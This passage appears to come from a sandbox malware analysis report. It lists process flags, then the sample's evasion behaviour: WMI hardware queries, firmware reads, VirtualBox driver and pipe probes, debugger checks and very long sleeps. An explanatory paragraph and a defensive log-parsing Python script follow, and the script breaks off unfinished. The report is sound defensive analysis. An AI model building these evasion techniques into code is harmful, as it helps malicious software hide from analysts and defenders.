            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\dllhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity (4 identical entries)
            Source: C:\Windows\SysWOW64\dllhost.exe | System information queried: FirmwareTableInformation (24 identical entries)
            Source: C:\Windows\SysWOW64\dllhost.exe | API/Special instruction interceptor: Address: 7FF8148AD044
            Source: C:\Windows\System32\svchost.exe | API/Special instruction interceptor: Address: 7FF8148AD044
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Memory allocated: 1160000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Memory allocated: 2BF0000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Memory allocated: 4BF0000 memory commit | memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: VBoxGuest
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: C:\Windows\SysWOW64\vboxservice.exe
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: C:\Windows\SysWOW64\vboxtray.exe
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sys
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: VBoxTrayIPC
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sys
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: C:\Windows\SysWOW64\vboxhook.dll
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: \pipe\VBoxTrayIPC
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sys
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: VBoxMiniRdrDN
            Source: C:\Windows\SysWOW64\dllhost.exe | File opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sys
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9059
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 818
            Source: C:\Windows\System32\svchost.exe TID: 5600 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 | Thread sleep count: 9059 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 | Thread sleep count: 818 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7064 | Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920 | Thread sleep time: -922337203685477s >= -30000s (2 identical entries)
            Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
            Source: C:\Windows\SysWOW64\dllhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS (2 identical entries)
            Source: C:\Windows\SysWOW64\dllhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\Windows\SysWOW64\dllhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem (4 identical entries)
            Source: C:\Windows\SysWOW64\dllhost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477 (2 identical entries)
            Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat
            Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
            Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
            Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe
            Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
            Source: C:\Windows\System32\svchost.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Process queried: DebugPort (4 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Process queried: DebugPort (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard
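
The dllhost.exe, powershell.exe and RegSvcs.exe entries above are a compact anti-analysis sweep: hardware enumeration over WMI (Win32_PnPEntity, Win32_BIOS, Win32_BaseBoard, Win32_ComputerSystem, Win32_Processor), repeated reads of the firmware table (SMBIOS/ACPI data, where a hypervisor usually names itself), probes for VirtualBox guest drivers, binaries and the VBoxTrayIPC pipe, DebugPort checks, and waits whose logged length, 922337203685477 ms, is Int64.MaxValue 100 ns ticks expressed in whole milliseconds, i.e. .NET's TimeSpan.MaxValue (the 1844674407370954 value is exactly twice that). The Python below is an added example written for this page, not Joe Sandbox code: it parses lines in the layout of the raw export, where the process path and the event name run together, buckets them into those categories and decodes the delay values. The sample lines are constructed to mirror the report's entries; the category names and the TimeSpan.MaxValue reading of the delays are this example's assumptions.

```python
"""Bucket sandbox anti-analysis events and decode .NET-style wait values.

Added example for this report page; not Joe Sandbox code. Lines in SAMPLE are
constructed to mirror the report's own entries. The category names and the
TimeSpan.MaxValue reading of the delay values are this example's interpretation.
"""
import re
from collections import defaultdict

# Report layout: "Source: <process>[ TID: n]<Event name>: <detail>". In the exported
# text the process path and the event name run together, so split at ".exe".
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe(?: TID: \d+)?)\s*\|?\s*"
    r"(?P<event>[A-Za-z][A-Za-z /]*?):\s?(?P<detail>.*)$"
)

# Int64.MaxValue ticks of 100 ns, in whole milliseconds: .NET's TimeSpan.MaxValue.
# A logged wait of exactly this length had no real deadline.
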